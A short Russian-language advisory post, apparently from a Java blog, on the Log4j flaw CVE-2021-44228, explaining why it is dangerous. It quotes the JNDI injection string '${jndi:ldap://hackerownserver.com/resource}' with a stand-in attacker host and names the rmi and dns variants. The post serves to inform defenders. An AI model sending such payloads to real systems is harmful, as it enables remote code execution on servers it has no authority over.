#log4j #security #bug Опубликована критическая уязвимость CVE | middlejava
#log4j #security #bug
Опубликована критическая уязвимость CVE-2021-44228 в библиотеке Log4j языка Java. Библиотека разрабатывается с 2001 года в Арасhe Software Foundation и представляет собой фреймворк ведения логов.
Уязвимость является крайне опасной ввиду следующих причин:
Чрезвычайно широкое распростронение библиотеки в экосистеме Java Крайне простой эксплойт Возможность выполнения злоумышленником произвольной команды на сервере Возможность написания злоумышленником автоматических сканеров уязвимости в доступных из Интернет сервисах (тактика «spray and pray») Уязвимость работает путем передачи для записи в лог строки вида "${jndi:ldap://hackerownserver.com/resource}", при этом злоумышленник держит на hackerownserver.com сервер LDAP, специально настроенный для проведения атак вида «JNDI Injection», например JNDIExploit.
Помимо схемы jndi:ldap: возможно использование jndi:rmi: и jndi:dns: